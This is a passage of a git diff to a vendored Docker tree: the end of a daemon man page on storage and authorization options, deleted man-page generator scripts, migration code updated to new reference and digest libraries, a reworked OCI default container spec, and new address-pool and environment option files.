a Docker daemon that is using the -`devicemapper` driver, run: - - $ docker info - [...] - Udev Sync Supported: true - [...] - -When `udev` sync support is `true`, then `devicemapper` and `udev` can -coordinate the activation and deactivation of devices for containers. - -When `udev` sync support is `false`, a race condition occurs between the -`devicemapper` and `udev` during create and cleanup. 
The race condition results -in errors and failures. (For information on these failures, see -[docker#4036](https://github.com/docker/docker/issues/4036)) - -To allow the `docker` daemon to start, regardless of whether `udev` sync is -`false`, set `dm.override_udev_sync_check` to true: - - $ dockerd --storage-opt dm.override_udev_sync_check=true - -When this value is `true`, the driver continues and simply warns you the errors -are happening. - -**Note**: The ideal is to pursue a `docker` daemon and environment that does -support synchronizing with `udev`. For further discussion on this topic, see -[docker#4036](https://github.com/docker/docker/issues/4036). -Otherwise, set this flag for migrating existing Docker daemons to a daemon with -a supported environment. - -#### dm.min_free_space - -Specifies the min free space percent in a thin pool require for new device -creation to succeed. This check applies to both free data space as well -as free metadata space. Valid values are from 0% - 99%. Value 0% disables -free space checking logic. If user does not specify a value for this option, -the Engine uses a default value of 10%. - -Whenever a new a thin pool device is created (during `docker pull` or during -container creation), the Engine checks if the minimum free space is available. -If the space is unavailable, then device creation fails and any relevant -`docker` operation fails. - -To recover from this error, you must create more free space in the thin pool to -recover from the error. You can create free space by deleting some images and -containers from tge thin pool. You can also add more storage to the thin pool. - -To add more space to an LVM (logical volume management) thin pool, just add -more storage to the group container thin pool; this should automatically -resolve any errors. If your configuration uses loop devices, then stop the -Engine daemon, grow the size of loop files and restart the daemon to resolve -the issue. 
- -Example use:: `dockerd --storage-opt dm.min_free_space=10%` - -#### dm.xfs_nospace_max_retries - -Specifies the maximum number of retries XFS should attempt to complete IO when -ENOSPC (no space) error is returned by underlying storage device. - -By default XFS retries infinitely for IO to finish and this can result in -unkillable process. To change this behavior one can set xfs_nospace_max_retries -to say 0 and XFS will not retry IO after getting ENOSPC and will shutdown -filesystem. - -Example use: - - $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 - - -## ZFS options - -#### zfs.fsname - -Set zfs filesystem under which docker will create its own datasets. By default -docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`) -is located. - -Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker` - -## Btrfs options - -#### btrfs.min_space - -Specifies the mininum size to use when creating the subvolume which is used for -containers. If user uses disk quota for btrfs when creating or running a -container with **--storage-opt size** option, docker should ensure the **size** -cannot be smaller than **btrfs.min_space**. - -Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G` - -# CLUSTER STORE OPTIONS - -The daemon uses libkv to advertise the node within the cluster. Some Key/Value -backends support mutual TLS, and the client TLS settings used by the daemon can -be configured using the **--cluster-store-opt** flag, specifying the paths to -PEM encoded files. - -#### kv.cacertfile - -Specifies the path to a local file with PEM encoded CA certificates to trust - -#### kv.certfile - -Specifies the path to a local file with a PEM encoded certificate. This -certificate is used as the client cert for communication with the Key/Value -store. - -#### kv.keyfile - -Specifies the path to a local file with a PEM encoded private key. 
This -private key is used as the client key for communication with the Key/Value -store. - -# Access authorization - -Docker's access authorization can be extended by authorization plugins that -your organization can purchase or build themselves. You can install one or more -authorization plugins when you start the Docker `daemon` using the -`--authorization-plugin=PLUGIN_ID` option. - -```bash -dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -The `PLUGIN_ID` value is either the plugin's name or a path to its -specification file. The plugin's implementation determines whether you can -specify a name or path. Consult with your Docker administrator to get -information about the plugins available to you. - -Once a plugin is installed, requests made to the `daemon` through the command -line or Docker's Engine API are allowed or denied by the plugin. If you have -multiple plugins installed, at least one must allow the request for it to -complete. - -For information about how to create an authorization plugin, see [authorization -plugin](https://docs.docker.com/engine/extend/authorization/) section in the -Docker extend section of this documentation. - - -# HISTORY -Sept 2015, Originally compiled by Shishir Mahajan -based on docker.com source material and internal work. 
diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go deleted file mode 100644 index f21614d94a..0000000000 --- a/vendor/github.com/docker/docker/man/generate.go +++ /dev/null @@ -1,43 +0,0 @@ -package main - -import ( - "fmt" - "os" - - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/commands" - "github.com/docker/docker/pkg/term" - "github.com/spf13/cobra" - "github.com/spf13/cobra/doc" -) - -func generateManPages(path string) error { - header := &doc.GenManHeader{ - Title: "DOCKER", - Section: "1", - Source: "Docker Community", - } - - stdin, stdout, stderr := term.StdStreams() - dockerCli := command.NewDockerCli(stdin, stdout, stderr) - cmd := &cobra.Command{Use: "docker"} - commands.AddCommands(cmd, dockerCli) - - cmd.DisableAutoGenTag = true - return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{ - Header: header, - Path: path, - CommandSeparator: "-", - }) -} - -func main() { - path := "/tmp" - if len(os.Args) > 1 { - path = os.Args[1] - } - fmt.Printf("Generating man pages into %s\n", path) - if err := generateManPages(path); err != nil { - fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error()) - } -} diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh deleted file mode 100755 index e4126ba4ac..0000000000 --- a/vendor/github.com/docker/docker/man/generate.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/bash -# -# Generate man pages for docker/docker -# - -set -eu - -mkdir -p ./man/man1 - -# Generate man pages from cobra commands -go build -o /tmp/gen-manpages ./man -/tmp/gen-manpages ./man/man1 - -# Generate legacy pages from markdown -./man/md2man-all.sh -q diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock deleted file mode 100644 index 5ec765a4c6..0000000000 --- a/vendor/github.com/docker/docker/man/glide.lock +++ /dev/null @@ -1,52 
+0,0 @@ -hash: ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb -updated: 2016-06-20T21:53:35.420817456Z -imports: -- name: github.com/BurntSushi/toml - version: f0aeabca5a127c4078abb8c8d64298b147264b55 -- name: github.com/cpuguy83/go-md2man - version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa - subpackages: - - md2man -- name: github.com/fsnotify/fsnotify - version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8 -- name: github.com/hashicorp/hcl - version: da486364306ed66c218be9b7953e19173447c18b - subpackages: - - hcl/ast - - hcl/parser - - hcl/token - - json/parser - - hcl/scanner - - hcl/strconv - - json/scanner - - json/token -- name: github.com/inconshreveable/mousetrap - version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 -- name: github.com/magiconair/properties - version: c265cfa48dda6474e208715ca93e987829f572f8 -- name: github.com/mitchellh/mapstructure - version: d2dd0262208475919e1a362f675cfc0e7c10e905 -- name: github.com/russross/blackfriday - version: 1d6b8e9301e720b08a8938b8c25c018285885438 -- name: github.com/shurcooL/sanitized_anchor_name - version: 10ef21a441db47d8b13ebcc5fd2310f636973c77 -- name: github.com/spf13/cast - version: 27b586b42e29bec072fe7379259cc719e1289da6 -- name: github.com/spf13/jwalterweatherman - version: 33c24e77fb80341fe7130ee7c594256ff08ccc46 -- name: github.com/spf13/pflag - version: dabebe21bf790f782ea4c7bbd2efc430de182afd -- name: github.com/spf13/viper - version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd -- name: golang.org/x/sys - version: 62bee037599929a6e9146f29d10dd5208c43507d - subpackages: - - unix -- name: gopkg.in/yaml.v2 - version: a83829b6f1293c91addabc89d0571c246397bbf4 -- name: github.com/spf13/cobra - repo: https://github.com/dnephin/cobra - subpackages: - - doc - version: v1.3 -devImports: [] diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml deleted file mode 100644 index e99b2670d8..0000000000 --- 
a/vendor/github.com/docker/docker/man/glide.yaml +++ /dev/null @@ -1,12 +0,0 @@ -package: github.com/docker/docker/man -import: -- package: github.com/cpuguy83/go-md2man - subpackages: - - md2man -- package: github.com/inconshreveable/mousetrap -- package: github.com/spf13/pflag -- package: github.com/spf13/viper -- package: github.com/spf13/cobra - repo: https://github.com/dnephin/cobra - subpackages: - - doc diff --git a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh deleted file mode 100755 index 97c65c93bc..0000000000 --- a/vendor/github.com/docker/docker/man/md2man-all.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash -set -e - -# get into this script's directory -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -[ "$1" = '-q' ] || { - set -x - pwd -} - -for FILE in *.md; do - base="$(basename "$FILE")" - name="${base%.md}" - num="${name##*.}" - if [ -z "$num" -o "$name" = "$num" ]; then - # skip files that aren't of the format xxxx.N.md (like README.md) - continue - fi - mkdir -p "./man${num}" - go-md2man -in "$FILE" -out "./man${num}/${name}" -done diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go index bc42dd2ca4..9cd759a3b8 100644 --- a/vendor/github.com/docker/docker/migrate/v1/migratev1.go +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go @@ -1,6 +1,7 @@ -package v1 +package v1 // import "github.com/docker/docker/migrate/v1" import ( + "encoding/json" "errors" "fmt" "io/ioutil" @@ -11,16 +12,15 @@ import ( "sync" "time" - "encoding/json" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/image" imagev1 "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/reference" + refstore 
"github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) type graphIDRegistrar interface { @@ -56,7 +56,7 @@ var ( // Migrate takes an old graph directory and transforms the metadata into the // new format. -func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error { +func Migrate(root, driverName string, ls layer.Store, is image.Store, rs refstore.Store, ms metadata.Store) error { graphDir := filepath.Join(root, graphDirName) if _, err := os.Lstat(graphDir); os.IsNotExist(err) { return nil @@ -88,11 +88,7 @@ func Migrate(root, driverName string, ls layer.Store, is image.Store, rs referen return err } - if err := migrateRefs(root, driverName, rs, mappings); err != nil { - return err - } - - return nil + return migrateRefs(root, driverName, rs, mappings) } // CalculateLayerChecksums walks an old graph directory and calculates checksums @@ -195,10 +191,7 @@ func saveMappings(root string, mappings map[string]image.ID) error { return err } defer f.Close() - if err := json.NewEncoder(f).Encode(mappings); err != nil { - return err - } - return nil + return json.NewEncoder(f).Encode(mappings) } func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error { @@ -325,19 +318,23 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image for name, repo := range repos.Repositories { for tag, id := range repo { if strongID, exists := mappings[id]; exists { - ref, err := reference.WithName(name) + ref, err := reference.ParseNormalizedNamed(name) if err != nil { logrus.Errorf("migrate tags: invalid name %q, %q", name, err) continue } - if dgst, err := digest.ParseDigest(tag); err == nil { + if !reference.IsNameOnly(ref) { + logrus.Errorf("migrate tags: invalid name %q, unexpected tag or digest", name) + continue + } + if dgst, err := digest.Parse(tag); err == nil { canonical, err := 
reference.WithDigest(reference.TrimNamed(ref), dgst) if err != nil { logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err) continue } if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil { - logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err) + logrus.Errorf("can't migrate digest %q for %q, err: %q", reference.FamiliarString(ref), strongID, err) } } else { tagRef, err := reference.WithTag(ref, tag) @@ -346,7 +343,7 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image continue } if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil { - logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err) + logrus.Errorf("can't migrate tag %q for %q, err: %q", reference.FamiliarString(ref), strongID, err) } } logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID) @@ -428,7 +425,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad if err != nil { return err } - diffID, err := digest.ParseDigest(string(diffIDData)) + diffID, err := digest.Parse(string(diffIDData)) if err != nil { return err } @@ -480,7 +477,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad checksum, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, "checksum")) if err == nil { // best effort - dgst, err := digest.ParseDigest(string(checksum)) + dgst, err := digest.Parse(string(checksum)) if err == nil { V2MetadataService := metadata.NewV2MetadataService(ms) V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst}) diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go index be82fdc75e..09cdac82da 100644 --- a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go @@ -1,4 +1,4 @@ -package v1 +package v1 // import 
"github.com/docker/docker/migrate/v1" import ( "crypto/rand" @@ -13,11 +13,11 @@ import ( "runtime" "testing" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" ) func TestMigrateRefs(t *testing.T) { @@ -40,9 +40,9 @@ func TestMigrateRefs(t *testing.T) { } expected := map[string]string{ - "busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", - "busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", - "registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", + "docker.io/library/busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "docker.io/library/busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "docker.io/library/registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", } if !reflect.DeepEqual(expected, ta.refs) { @@ -87,14 +87,15 @@ func TestMigrateContainers(t *testing.T) { t.Fatal(err) } - ls := &mockMounter{} - ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) if err != nil { t.Fatal(err) } - is, err := image.NewImageStore(ifs, ls) + ls := &mockMounter{} + mmMap := make(map[string]image.LayerGetReleaser) + mmMap[runtime.GOOS] = ls + is, err := image.NewImageStore(ifs, mmMap) if err != nil { t.Fatal(err) } @@ -165,14 +166,15 @@ func TestMigrateImages(t *testing.T) { t.Fatal(err) } - ls := &mockRegistrar{} - ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) if err != nil { t.Fatal(err) } - is, err := image.NewImageStore(ifs, ls) + ls := 
&mockRegistrar{} + mrMap := make(map[string]image.LayerGetReleaser) + mrMap[runtime.GOOS] = ls + is, err := image.NewImageStore(ifs, mrMap) if err != nil { t.Fatal(err) } @@ -323,10 +325,7 @@ func addContainer(dest, jsonConfig string) error { if err := os.MkdirAll(contDir, 0700); err != nil { return err } - if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil { - return err - } - return nil + return ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600) } type mockTagAdder struct { diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults.go similarity index 58% rename from vendor/github.com/docker/docker/oci/defaults_linux.go rename to vendor/github.com/docker/docker/oci/defaults.go index 8b3ce7281b..4145412dd4 100644 --- a/vendor/github.com/docker/docker/oci/defaults_linux.go +++ b/vendor/github.com/docker/docker/oci/defaults.go @@ -1,4 +1,4 @@ -package oci +package oci // import "github.com/docker/docker/oci" import ( "os" @@ -7,19 +7,65 @@ import ( "github.com/opencontainers/runtime-spec/specs-go" ) -func sPtr(s string) *string { return &s } func iPtr(i int64) *int64 { return &i } func u32Ptr(i int64) *uint32 { u := uint32(i); return &u } func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm } -// DefaultSpec returns default oci spec used by docker. 
+func defaultCapabilities() []string { + return []string{ + "CAP_CHOWN", + "CAP_DAC_OVERRIDE", + "CAP_FSETID", + "CAP_FOWNER", + "CAP_MKNOD", + "CAP_NET_RAW", + "CAP_SETGID", + "CAP_SETUID", + "CAP_SETFCAP", + "CAP_SETPCAP", + "CAP_NET_BIND_SERVICE", + "CAP_SYS_CHROOT", + "CAP_KILL", + "CAP_AUDIT_WRITE", + } +} + +// DefaultSpec returns the default spec used by docker for the current Platform func DefaultSpec() specs.Spec { + return DefaultOSSpec(runtime.GOOS) +} + +// DefaultOSSpec returns the spec for a given OS +func DefaultOSSpec(osName string) specs.Spec { + if osName == "windows" { + return DefaultWindowsSpec() + } + return DefaultLinuxSpec() +} + +// DefaultWindowsSpec create a default spec for running Windows containers +func DefaultWindowsSpec() specs.Spec { + return specs.Spec{ + Version: specs.Version, + Windows: &specs.Windows{}, + Process: &specs.Process{}, + Root: &specs.Root{}, + } +} + +// DefaultLinuxSpec create a default spec for running Linux containers +func DefaultLinuxSpec() specs.Spec { s := specs.Spec{ Version: specs.Version, - Platform: specs.Platform{ - OS: runtime.GOOS, - Arch: runtime.GOARCH, + Process: &specs.Process{ + Capabilities: &specs.LinuxCapabilities{ + Bounding: defaultCapabilities(), + Permitted: defaultCapabilities(), + Inheritable: defaultCapabilities(), + Effective: defaultCapabilities(), + }, }, + Root: &specs.Root{}, } s.Mounts = []specs.Mount{ { @@ -32,7 +78,7 @@ func DefaultSpec() specs.Spec { Destination: "/dev", Type: "tmpfs", Source: "tmpfs", - Options: []string{"nosuid", "strictatime", "mode=755"}, + Options: []string{"nosuid", "strictatime", "mode=755", "size=65536k"}, }, { Destination: "/dev/pts", @@ -58,31 +104,23 @@ func DefaultSpec() specs.Spec { Source: "mqueue", Options: []string{"nosuid", "noexec", "nodev"}, }, - } - s.Process.Capabilities = []string{ - "CAP_CHOWN", - "CAP_DAC_OVERRIDE", - "CAP_FSETID", - "CAP_FOWNER", - "CAP_MKNOD", - "CAP_NET_RAW", - "CAP_SETGID", - "CAP_SETUID", - "CAP_SETFCAP", - 
"CAP_SETPCAP", - "CAP_NET_BIND_SERVICE", - "CAP_SYS_CHROOT", - "CAP_KILL", - "CAP_AUDIT_WRITE", + { + Destination: "/dev/shm", + Type: "tmpfs", + Source: "shm", + Options: []string{"nosuid", "noexec", "nodev", "mode=1777"}, + }, } s.Linux = &specs.Linux{ MaskedPaths: []string{ "/proc/kcore", + "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", + "/proc/scsi", "/sys/firmware", }, ReadonlyPaths: []string{ @@ -93,7 +131,7 @@ func DefaultSpec() specs.Spec { "/proc/sys", "/proc/sysrq-trigger", }, - Namespaces: []specs.Namespace{ + Namespaces: []specs.LinuxNamespace{ {Type: "mount"}, {Type: "network"}, {Type: "uts"}, @@ -102,67 +140,72 @@ func DefaultSpec() specs.Spec { }, // Devices implicitly contains the following devices: // null, zero, full, random, urandom, tty, console, and ptmx. - // ptmx is a bind-mount or symlink of the container's ptmx. + // ptmx is a bind mount or symlink of the container's ptmx. // See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices - Devices: []specs.Device{}, - Resources: &specs.Resources{ - Devices: []specs.DeviceCgroup{ + Devices: []specs.LinuxDevice{}, + Resources: &specs.LinuxResources{ + Devices: []specs.LinuxDeviceCgroup{ { Allow: false, - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(5), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(3), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(9), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(8), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(5), Minor: iPtr(0), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: 
iPtr(5), Minor: iPtr(1), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: false, - Type: sPtr("c"), + Type: "c", Major: iPtr(10), Minor: iPtr(229), - Access: sPtr("rwm"), + Access: "rwm", }, }, }, } + // For LCOW support, populate a blank Windows spec + if runtime.GOOS == "windows" { + s.Windows = &specs.Windows{} + } + return s } diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go deleted file mode 100644 index 85c8b68e16..0000000000 --- a/vendor/github.com/docker/docker/oci/defaults_solaris.go +++ /dev/null @@ -1,20 +0,0 @@ -package oci - -import ( - "runtime" - - "github.com/opencontainers/runtime-spec/specs-go" -) - -// DefaultSpec returns default oci spec used by docker. -func DefaultSpec() specs.Spec { - s := specs.Spec{ - Version: "0.6.0", - Platform: specs.Platform{ - OS: "SunOS", - Arch: runtime.GOARCH, - }, - } - s.Solaris = &specs.Solaris{} - return s -} diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go deleted file mode 100644 index ab51904ec4..0000000000 --- a/vendor/github.com/docker/docker/oci/defaults_windows.go +++ /dev/null @@ -1,19 +0,0 @@ -package oci - -import ( - "runtime" - - "github.com/opencontainers/runtime-spec/specs-go" -) - -// DefaultSpec returns default spec used by docker. 
-func DefaultSpec() specs.Spec { - return specs.Spec{ - Version: specs.Version, - Platform: specs.Platform{ - OS: runtime.GOOS, - Arch: runtime.GOARCH, - }, - Windows: &specs.Windows{}, - } -} diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go index 2840d2586a..46d4e1d32d 100644 --- a/vendor/github.com/docker/docker/oci/devices_linux.go +++ b/vendor/github.com/docker/docker/oci/devices_linux.go @@ -1,4 +1,4 @@ -package oci +package oci // import "github.com/docker/docker/oci" import ( "fmt" @@ -8,12 +8,12 @@ import ( "github.com/opencontainers/runc/libcontainer/configs" "github.com/opencontainers/runc/libcontainer/devices" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" ) -// Device transforms a libcontainer configs.Device to a specs.Device object. -func Device(d *configs.Device) specs.Device { - return specs.Device{ +// Device transforms a libcontainer configs.Device to a specs.LinuxDevice object. +func Device(d *configs.Device) specs.LinuxDevice { + return specs.LinuxDevice{ Type: string(d.Type), Path: d.Path, Major: d.Major, @@ -24,19 +24,19 @@ func Device(d *configs.Device) specs.Device { } } -func deviceCgroup(d *configs.Device) specs.DeviceCgroup { +func deviceCgroup(d *configs.Device) specs.LinuxDeviceCgroup { t := string(d.Type) - return specs.DeviceCgroup{ + return specs.LinuxDeviceCgroup{ Allow: true, - Type: &t, + Type: t, Major: &d.Major, Minor: &d.Minor, - Access: &d.Permissions, + Access: d.Permissions, } } // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. 
-func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) { resolvedPathOnHost := pathOnHost // check if it is a symbolic link diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go index 6252cab536..af6dd3bda2 100644 --- a/vendor/github.com/docker/docker/oci/devices_unsupported.go +++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package oci +package oci // import "github.com/docker/docker/oci" import ( "errors" @@ -11,10 +11,10 @@ import ( // Device transforms a libcontainer configs.Device to a specs.Device object. // Not implemented -func Device(d *configs.Device) specs.Device { return specs.Device{} } +func Device(d *configs.Device) specs.LinuxDevice { return specs.LinuxDevice{} } // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. 
// Not implemented -func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) { return nil, nil, errors.New("oci/devices: unsupported platform") } diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go index 4902482498..5a2d8f2087 100644 --- a/vendor/github.com/docker/docker/oci/namespaces.go +++ b/vendor/github.com/docker/docker/oci/namespaces.go @@ -1,16 +1,13 @@ -package oci +package oci // import "github.com/docker/docker/oci" -import specs "github.com/opencontainers/runtime-spec/specs-go" +import "github.com/opencontainers/runtime-spec/specs-go" // RemoveNamespace removes the `nsType` namespace from OCI spec `s` -func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) { - idx := -1 +func RemoveNamespace(s *specs.Spec, nsType specs.LinuxNamespaceType) { for i, n := range s.Linux.Namespaces { if n.Type == nsType { - idx = i + s.Linux.Namespaces = append(s.Linux.Namespaces[:i], s.Linux.Namespaces[i+1:]...) + return } } - if idx >= 0 { - s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...) 
- } } diff --git a/vendor/github.com/docker/docker/opts/address_pools.go b/vendor/github.com/docker/docker/opts/address_pools.go new file mode 100644 index 0000000000..9b27a62853 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/address_pools.go @@ -0,0 +1,84 @@ +package opts + +import ( + "encoding/csv" + "encoding/json" + "fmt" + "strconv" + "strings" + + types "github.com/docker/libnetwork/ipamutils" +) + +// PoolsOpt is a Value type for parsing the default address pools definitions +type PoolsOpt struct { + values []*types.NetworkToSplit +} + +// UnmarshalJSON fills values structure info from JSON input +func (p *PoolsOpt) UnmarshalJSON(raw []byte) error { + return json.Unmarshal(raw, &(p.values)) +} + +// Set predefined pools +func (p *PoolsOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + poolsDef := types.NetworkToSplit{} + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + key := strings.ToLower(parts[0]) + value := strings.ToLower(parts[1]) + + switch key { + case "base": + poolsDef.Base = value + case "size": + size, err := strconv.Atoi(value) + if err != nil { + return fmt.Errorf("invalid size value: %q (must be integer): %v", value, err) + } + poolsDef.Size = size + default: + return fmt.Errorf("unexpected key '%s' in '%s'", key, field) + } + } + + p.values = append(p.values, &poolsDef) + + return nil +} + +// Type returns the type of this option +func (p *PoolsOpt) Type() string { + return "pool-options" +} + +// String returns a string repr of this option +func (p *PoolsOpt) String() string { + var pools []string + for _, pool := range p.values { + repr := fmt.Sprintf("%s %d", pool.Base, pool.Size) + pools = append(pools, repr) + } + return strings.Join(pools, ", ") +} + +// Value returns the mounts +func (p 
*PoolsOpt) Value() []*types.NetworkToSplit { + return p.values +} + +// Name returns the flag name of this option +func (p *PoolsOpt) Name() string { + return "default-address-pools" +} diff --git a/vendor/github.com/docker/docker/opts/address_pools_test.go b/vendor/github.com/docker/docker/opts/address_pools_test.go new file mode 100644 index 0000000000..7f9c709968 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/address_pools_test.go @@ -0,0 +1,20 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "testing" +) + +func TestAddressPoolOpt(t *testing.T) { + poolopt := &PoolsOpt{} + var addresspool = "base=175.30.0.0/16,size=16" + var invalidAddresspoolString = "base=175.30.0.0/16,size=16, base=175.33.0.0/16,size=24" + + if err := poolopt.Set(addresspool); err != nil { + t.Fatal(err) + } + + if err := poolopt.Set(invalidAddresspoolString); err == nil { + t.Fatal(err) + } + +} diff --git a/vendor/github.com/docker/docker/opts/env.go b/vendor/github.com/docker/docker/opts/env.go new file mode 100644 index 0000000000..f6e5e9074d --- /dev/null +++ b/vendor/github.com/docker/docker/opts/env.go @@ -0,0 +1,48 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "fmt" + "os" + "runtime" + "strings" + + "github.com/pkg/errors" +) + +// ValidateEnv validates an environment variable and returns it. +// If no value is specified, it returns the current value using os.Getenv. +// +// As on ParseEnvFile and related to #16585, environment variable names +// are not validate what so ever, it's up to application inside docker +// to validate them or not. 
